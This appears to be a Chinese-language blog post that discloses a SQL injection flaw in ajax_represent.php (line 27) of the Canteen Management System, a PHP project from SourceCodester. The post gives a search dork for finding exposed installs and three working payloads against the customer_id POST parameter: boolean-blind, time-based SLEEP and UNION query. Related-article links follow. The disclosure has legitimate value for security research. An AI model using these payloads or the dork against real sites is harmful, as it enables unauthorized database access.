Canteen Management System ajax_represent.php sql injection

最新推荐文章于 2025-11-07 08:27:24 发布
原创 最新推荐文章于 2025-11-07 08:27:24 发布 · 3.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #ajax #sql

本文介绍了一个存在于食堂管理系统ajax_represent.php文件中的SQL注入漏洞。该漏洞出现在第27行,由于未对用户输入的数据进行有效过滤,可能导致攻击者执行任意SQL命令。
Canteen Management System ajax_represent.php sql injection

inurl: youthappam/php_action/ajax_represent.php

Abstract:

Line 27 of ajax_represent.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement’s meaning or to execute arbitrary SQL commands.

Explanation:

SQL injection errors occur when:

  1. Data enters a program from an untrusted source.
  2. The data is used to dynamically construct a SQL query.

In this case, the data is passed to query() in ajax_represent.php at line 27.

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

current-db

在这里插入图片描述
payload:

Parameter: customer_id (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: customer_id=1' AND 4961=4961 AND 'mqPP'='mqPP

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: customer_id=1' AND (SELECT 6401 FROM (SELECT(SLEEP(5)))eypH) AND 'vuyE'='vuyE

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: customer_id=-9319' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b7671,0x6c415159714766417374776d5443614642596d75705455494944776c49436974744d56574146766d,0x7171717871),NULL,NULL,NULL,NULL-- -

Download Code:
https://www.sourcecodester.com/php/15688/canteen-management-system-project-source-code-php.html

huangsirer
关注
Python入门:深入了解__init__.py 文件(如何实现动态导入子模块)
XiaoqiangClub的博客
09-30 465
Python入门:深入了解__init__.py 文件(如何实现动态导入子模块)
Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
qq_41988749的博客
10-27 3266
【代码】Web-Based Student Clearance System is vulnerable to a SQL Injection(edit-admin.php)
SourceCodester Online Tours & Travels Management System booking.php sql injection
@sec
09-05 1万+
【代码】SourceCodester Online Tours & Travels Management System booking.php sql injection
SourceCodester Yoga Class Registration System manage_category sql injection
Dwayne_Wade的博客
03-13 1万+
【代码】SourceCodester Yoga Class Registration System manage_category sql injection
SQL Injection
kezhen的专栏
03-23 2748
https://www.owasp.org/index.php/SQL_Injection Overview A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A succe
Java报错注入,Java中的JSON注入强化错误
weixin_32047493的博客
03-22 451
我从客户端获取 SUBSCRIPTION_JSON ,将其转换为String,然后使用gson库将其设置为ModelObject。在Fortify安全性上运行代码时,它在以下代码上给我Json注入错误,并显示以下消息:这是错误:On line 159 of ActionHelper.java, the method jsonToObject() writes unvalidated input i...
KSroido_canteen_29992_1752556452970.zip
07-15
由于您提供的信息中标题和描述是相同的,并且标签为空,而压缩包内仅包含一个名为“canteen-master”的文件夹,这使得分析的内容十分有限。不过,从文件夹名称“canteen-master”可以推测,这可能是一个与餐饮服务...
canteen-management-system-final.zip
08-19
餐厅点餐平台整套源码 + 数据库源文件 + 教程
nodejs中查询mysql防止SQL注入
cowcomic的专栏
08-03 6506
Performing queries The most basic way to perform a query is to call the .query() method on an object (like a Connection, Pool, or PoolNamespace instance). The simplest form of .query() is .query(sql...
java json injection_在Java中强化JSON注入错误
weixin_42565652的博客
02-24 596
我从客户端获取SUBSCRIPTION_JSON,我将其转换为String,然后使用gson库将其设置为Model Object.在Fortify安全性上运行代码时,它在下面的代码中给出了Json注入错误,并带有以下消息:这是错误:On line 159 of ActionHelper.java, the method jsonToObject() writes unvalidated input...
FindBugs规则整理-下
dingnate的专栏
01-20 1万+
86.RV: Method ignores return value (RV_RETURN_VALUE_IGNORED) 该方法的返回值应该进行检查。这种警告通常出现在调用一个不可变对象的方法,认为它更新了对象的值。例如:String dateString = getHeaderField(name); dateString.trim(); 程序员似乎以为trim()方法将更新dateStr
SQL Injection --- from dvwa的网页链接——2021-12-8
stumiss的博客
12-08 465
文章目录OverviewThread Model 威胁建模DiscriptionRisk Factor Overview A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from t
执行sql时出现错误 extraneous input ';' expecting EOF near '<EOF>'
热门推荐
xieganyu3460的博客
10-15 5万+
原文问题: 调用jdbc执行hive sql时出现错误 Error while compiling statement: FAILED: ParseException line 5:22 extraneous input ';' expecting EOF near '&lt;EOF&gt;' 错误原因是因为sql语句中多了分号   执行脚本时需要在sql后面添加分号 但是调用jdbc...
Java代码审计手册(English)
重新启程
10-14 1万+
Table of Contents Predictable pseudorandom number generator (PREDICTABLE_RANDOM) Predictable pseudorandom number generator (Scala) (PREDICTABLE_RANDOM_SCALA) Untrusted servlet parameter (SERVLET...
PHP PCRE
wjs2024的博客
11-04 420
PHP PCRE扩展是一个功能强大的工具,可以帮助你轻松处理文本和正则表达式。通过了解PCRE的基本语法和高级特性,你可以实现各种复杂的文本匹配和处理任务。在本篇文章中,我们介绍了PCRE的安装、基础语法、高级特性以及一个简单的实例。希望这些信息能帮助你更好地掌握PHP PCRE扩展。
CTFHub Web进阶-PHP:Bypass_disable_function通关6之Json Serializer UAF
最新发布
mooyuan的网络安全博客
11-07 1448
本文详细讲解CTFHub的Web进阶中disable-functions的Json Serializer UAF关卡的渗透全流程,展示利用PHP JSON序列化组件Bug#77843绕过disable_functions限制的渗透方法。通过蚁剑工具连接靶场后,使用disablefunction插件中的JsonSerializerUAF模式成功执行命令获取flag。该风险源于PHP 7.3.3版本中json_encode处理JsonSerializable接口时的引用计数错误,导致释放后使用(UAF)
Expression #2 of SELECT list is not in GROUP BY clause and contains nonaggregated column 'zljg_cockpit.r_d_canteen_202505.data_time' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by
05-09
当启用 `sql_mode=only_full_group_by` 时,MySQL 要求查询中的每一列要么出现在 `GROUP BY` 子句中,要么作为聚合函数的一部分。如果违反此规则,则会抛出类似于以下错误: > Expression #X of SELECT list is not...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值